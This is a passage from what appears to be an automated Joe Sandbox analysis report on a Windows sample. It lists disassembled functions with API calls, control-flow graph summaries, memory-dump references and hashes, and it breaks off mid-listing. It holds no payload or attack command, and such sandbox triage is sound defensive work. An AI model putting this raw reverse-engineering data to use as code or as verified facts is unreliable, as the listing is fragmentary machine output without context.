                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00D3F62D,?,00D35904,?,?,?,00000000), ref: 00D3FD37
                                                                                                                                                                                                • GetLastError.KERNEL32(?,00D3F62D,?,00D35904,?,?,?,00000000,?,?,?,?,?,00D356A2,?,00D35904), ref: 00D3FD5D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 442123175-0
                                                                                                                                                                                                • Opcode ID: 76fc330f9c31bdf1fff383535c31dcfdb5bc85ea0bb102bef76b495b51d5813d
                                                                                                                                                                                                • Instruction ID: 0b2eeb1d26166497031087b5bc4b64fe0b2e04419c51a2fc7583a5dd24e6dcd7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 76fc330f9c31bdf1fff383535c31dcfdb5bc85ea0bb102bef76b495b51d5813d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 23216D35A002199BCB19CF29DC84AE9B7F9EB49305F2444AAE906D7255D6309E82CF70
                                                                                                                                                                                                Function 00D3A59C Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 324 d3a59c-d3a5a1 325 d3a5a3-d3a5bb 324->325 326 d3a5c9-d3a5d2 325->326 327 d3a5bd-d3a5c1 325->327 329 d3a5e4 326->329 330 d3a5d4-d3a5d7 326->330 327->326 328 d3a5c3-d3a5c7 327->328 331 d3a63e-d3a642 328->331 334 d3a5e6-d3a5f3 GetStdHandle 329->334 332 d3a5e0-d3a5e2 330->332 333 d3a5d9-d3a5de 330->333 331->325 335 d3a648-d3a64b 331->335 332->334 333->334 336 d3a620-d3a632 334->336 337 d3a5f5-d3a5f7 334->337 336->331 339 d3a634-d3a637 336->339 337->336 338 d3a5f9-d3a602 GetFileType 337->338 338->336 340 d3a604-d3a60d 338->340 339->331 341 d3a615-d3a618 340->341 342 d3a60f-d3a613 340->342 341->331 343 d3a61a-d3a61e 341->343 342->331 343->331
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00D3A48B,00D4DC40,0000000C), ref: 00D3A5E8
                                                                                                                                                                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00D3A48B,00D4DC40,0000000C), ref: 00D3A5FA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3000768030-0
                                                                                                                                                                                                • Opcode ID: 7d144334e34ac3e09ee03918943e039a3d99ebab4b60aa39a3703e3a1ae92848
                                                                                                                                                                                                • Instruction ID: ae1ff19e4dc3a34512bceed003fad48e4a12fe8afeccbfb25e6f678376ba5694
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d144334e34ac3e09ee03918943e039a3d99ebab4b60aa39a3703e3a1ae92848
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6811B171704B414AC7308E3E8C89626BA94A756370F3C071AE4F6C66F1C734DD82D672
                                                                                                                                                                                                Function 00D370B7 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLastError.KERNEL32(00D4D900,0000000C), ref: 00D370CA
                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 00D370D1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorExitLastThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1611280651-0
                                                                                                                                                                                                • Opcode ID: 41968e208d16304ac7f258056b44551572b60387cfc216f77802c9a117886673
                                                                                                                                                                                                • Instruction ID: d94fd2daa3333b42c6b0af2f9e6b88e9907e4973b55cc3758cb2655934a69413
                                                                                                                                                                                                • Opcode Fuzzy Hash: 41968e208d16304ac7f258056b44551572b60387cfc216f77802c9a117886673
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AF0CDB5A01704AFDB24EFB0C84AA6E7B74EF01711F200148F006A72A2CF749900CBB1
                                                                                                                                                                                                Function 00D39C89 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 364 d39c89-d39cb3 365 d39cb5-d39cb7 364->365 366 d39cb9-d39cbb 364->366 367 d39d0a-d39d0d 365->367 368 d39cc1-d39cc8 call d39bbe 366->368 369 d39cbd-d39cbf 366->369 371 d39ccd-d39cd1 368->371 369->367 372 d39cd3-d39ce1 GetProcAddress 371->372 373 d39cf0-d39d07 371->373 372->373 374 d39ce3-d39cee call d34fc7 372->374 375 d39d09 373->375 374->375 375->367
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 370be67875d0ad6d1d903793b26f7e7de5ae9acc2ee06726e2867bebabcdd492
                                                                                                                                                                                                • Instruction ID: d589bff166aef2bde653ba717c17db0be80021f8c1f0e771960c988422f0a259
                                                                                                                                                                                                • Opcode Fuzzy Hash: 370be67875d0ad6d1d903793b26f7e7de5ae9acc2ee06726e2867bebabcdd492
                                                                                                                                                                                                • Instruction Fuzzy Hash: BB01F13B200321AF9B02CF68FC95A16B7A5FBC2724F294924F901CB294DA70E80087B0
                                                                                                                                                                                                Function 00D3B8D6 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 378 d3b8d6-d3b8e2 379 d3b914-d3b91f call d3b6de 378->379 380 d3b8e4-d3b8e6 378->380 387 d3b921-d3b923 379->387 382 d3b8e8-d3b8e9 380->382 383 d3b8ff-d3b910 RtlAllocateHeap 380->383 382->383 384 d3b912 383->384 385 d3b8eb-d3b8f2 call d38434 383->385 384->387 385->379 390 d3b8f4-d3b8fd call d374be 385->390 390->379 390->383
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00D3AB77,?,?,00D3AB77,00000220,?,00000000,?), ref: 00D3B908
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                • Opcode ID: cf3756e19d6201e56062f89a9d6fb91e9739a97df36f6261d47ca2098836e6b8
                                                                                                                                                                                                • Instruction ID: e71fb0db0d77cd06cd3d3b1e8bbba28bc5a32131348f32b442f644a50a0eaefe
                                                                                                                                                                                                • Opcode Fuzzy Hash: cf3756e19d6201e56062f89a9d6fb91e9739a97df36f6261d47ca2098836e6b8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DE06532606725A7D6312B65AC0576A3A4CDB867B0F190123FF54D6292CF60DD00D9F4

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Function 00D41A10 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 7946e7d3bd8a4c71b1004167feaff1146a0b4289e9922db4fb30fff94b398ee0
                                                                                                                                                                                                • Instruction ID: 44ec00d5a974b740904f06ec479b1c8a7cc5aef5eadb1c8909501915540def0d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7946e7d3bd8a4c71b1004167feaff1146a0b4289e9922db4fb30fff94b398ee0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 28022D75E012199BDF14CFA9C9806AEFBF1FF48314F288269E915A7341D731A945CBA0
                                                                                                                                                                                                Function 00D339F1 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D339FD
                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00D33AC9
                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D33AE2
                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00D33AEC
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                                • Opcode ID: bac358f57ddc26ab34bbb713c3137815b1a43da428cde048cdf0b70e6709529f
                                                                                                                                                                                                • Instruction ID: 16e6312fdf4eff8e1d44a689af533205312177b726344f39073cdddebcdb075f
                                                                                                                                                                                                • Opcode Fuzzy Hash: bac358f57ddc26ab34bbb713c3137815b1a43da428cde048cdf0b70e6709529f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9731F775D053189BDB21DFA4D9497CDBBB8EF08300F1041AAE40DAB250EB709B85CF65
                                                                                                                                                                                                Function 00D38077 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D3816F
                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D38179
                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00D38186
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                • Opcode ID: 29c519fdda36456cc34fefeec2fa6b5a05563bad165d231504f4ae4fce870f84
                                                                                                                                                                                                • Instruction ID: d3e8d92d6d98e1219380bdd5d680ae727c36e7021af2df29fd83c698e6456ca7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 29c519fdda36456cc34fefeec2fa6b5a05563bad165d231504f4ae4fce870f84
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4131C274911328ABCB61DF68DC897CDBBB8FF48310F5045EAE40CA6250EB749B858F64
                                                                                                                                                                                                Function 00D39E16 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                • Opcode ID: 9e814cdacb32467c77c0e0c30f29c91458a2dd3b602e97dde0a662ee42783d6d
                                                                                                                                                                                                • Instruction ID: b5704e6b8c226c8c3ec6637e299c0ee26b57f62ced7f4603fa9961885b8cfef8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e814cdacb32467c77c0e0c30f29c91458a2dd3b602e97dde0a662ee42783d6d
                                                                                                                                                                                                • Instruction Fuzzy Hash: BDA011382023008B83808F32AA0830C3AA8BA032E03008028A008C2230EB208080AF20
                                                                                                                                                                                                Function 00D43FDE Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 127012223-0
                                                                                                                                                                                                • Opcode ID: 57dfb692aeb69133a4a14ea7ba7e34e8ba47243bd72c595f444e30d1f5a7af54
                                                                                                                                                                                                • Instruction ID: 2180a6f6762e41d9277b67db4a7693962ea729b9ffec8d75f5899e5dbac5b824
                                                                                                                                                                                                • Opcode Fuzzy Hash: 57dfb692aeb69133a4a14ea7ba7e34e8ba47243bd72c595f444e30d1f5a7af54
                                                                                                                                                                                                • Instruction Fuzzy Hash: F171D132900205ABDF219EA4CC81BAF7BAAEF49350F2D4159FA44B7281DB75DD9087B4
                                                                                                                                                                                                Function 00D3C28B Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                                                • Opcode ID: 6f50279ee7fba881e46e44fc6ac24256dd30adf8a6b45f72db007344eb616516
                                                                                                                                                                                                • Instruction ID: 51a3561f46d74911c6712c3ea5f05b82cd2e5192948ceb6c349f130dc99affc6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f50279ee7fba881e46e44fc6ac24256dd30adf8a6b45f72db007344eb616516
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FB18772A10355AFDB118F68CC81BBE7BA5EF55310F189165E944BF282D774E901C7B0
                                                                                                                                                                                                Function 00D34650 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00D34687
                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00D3468F
                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00D34718
                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00D34743
                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00D34798
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                • Opcode ID: 0f4035631dd43d686c555b4908fb8f9dc3604e9b29e411f020f2f0c99fc31e23
                                                                                                                                                                                                • Instruction ID: 938acf224a03d69f2f44627e41f8ec9c441f9dd68dcfaefb981352fa8dfc1da3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f4035631dd43d686c555b4908fb8f9dc3604e9b29e411f020f2f0c99fc31e23
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6241C274A00208ABCF10DF68C885A9EBBB5FF46324F188455E815AB392D779E915CBF1
                                                                                                                                                                                                Function 00D33269 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D3326F
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00D3327D
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00D3328E
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
